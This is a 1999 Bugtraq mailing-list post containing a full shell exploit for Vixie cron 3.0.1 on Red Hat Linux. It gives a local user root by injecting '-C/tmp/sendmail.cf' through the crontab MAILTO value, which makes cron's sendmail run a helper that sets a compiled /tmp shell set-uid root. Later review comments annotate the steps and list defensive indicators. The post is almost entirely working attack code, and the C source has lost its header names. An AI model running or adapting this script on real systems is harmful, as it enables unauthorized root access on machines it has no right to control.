Subject: Vixie Crontab exploit code
To: BUGTRAQ@SECURITYFOCUS.COM

Vixie Crontab exploit code

begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh
# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug

# NOTE(review): the archive collapsed this script onto two lines; line breaks
# are restored here and every command is kept as posted.
#
# What the script does, in order:
#   1. writes and compiles /tmp/sh, a C program that calls setuid(0) and
#      setgid(0) and then execs /bin/sh;
#   2. writes /tmp/makesh, which makes /tmp/sh root-owned and set-uid (4755);
#   3. copies /etc/sendmail.cf into /tmp and rewrites the procmail mailer
#      entry so that it names /tmp/makesh;
#   4. installs a crontab whose MAILTO value begins with "-C/tmp/sendmail.cf";
#   5. waits for the next cron run, starts /tmp/sh, then deletes its files.
#
# The post does not explain the underlying flaw. From the shape of the MAILTO
# value it presumably depends on cron placing MAILTO unfiltered on the
# mailer's command line, where -C selects an alternate sendmail config file
# (inference, confirm against the vendor advisory for your cron package).
#
# Defensive takeaways: run a cron build that validates MAILTO, mount /tmp
# nosuid, and treat a crontab MAILTO that begins with "-" or a set-uid root
# file under /tmp as indicators of this technique.

# Fixed PATH so the tools below resolve to system binaries.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH

# Banner.
echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo

# Step 1: C source for the helper binary. It only gains privilege if the
# compiled file later becomes set-uid root (step 2 / cron run).
# NOTE(review): the header names after the two "#include" directives are
# missing on the page, apparently stripped by the archive's HTML rendering.
echo make shell
echo
cat > /tmp/sh.c << EOF
#include
#include
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF

# Build with cc, falling back to gcc if cc fails.
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c

# Step 2: helper script that hands /tmp/sh to root and sets mode 4755
# (set-uid). It has an effect only when something running as root executes it.
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh

# Step 3: build a modified copy of the system sendmail.cf under /tmp.
# The P= and A= substitutions retarget the mailer definition that used
# procmail so that it names /tmp/makesh instead.
# For forensics: the second sed reads sendmail.cf.tmp1 again and the cp below
# overwrites /tmp/sendmail.cf, so the file left for cron differs from the
# system copy only in the P=/A= mailer lines.
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3

# Step 4: crontab content. The here-document delimiter is unquoted, so
# `whoami` is expanded when the file is written. MAILTO therefore becomes
# "-C/tmp/sendmail.cf <current user>"; the job itself (ls, every minute) only
# exists to produce output for cron to mail.
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF

# Installs the file as the invoking user's crontab, replacing any existing one.
echo input cron file
echo
crontab /tmp/cronfile

# Sleep until roughly five seconds past the next minute boundary, i.e. just
# after the every-minute job has had a chance to run.
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait

# Step 5: run the helper binary built in step 1.
echo execute shell
echo
/tmp/sh

# Cleanup. The rm list does not include /tmp/sh itself, so the binary stays
# on disk; "crontab /dev/null" installs an empty crontab over the one above.
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex

--
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug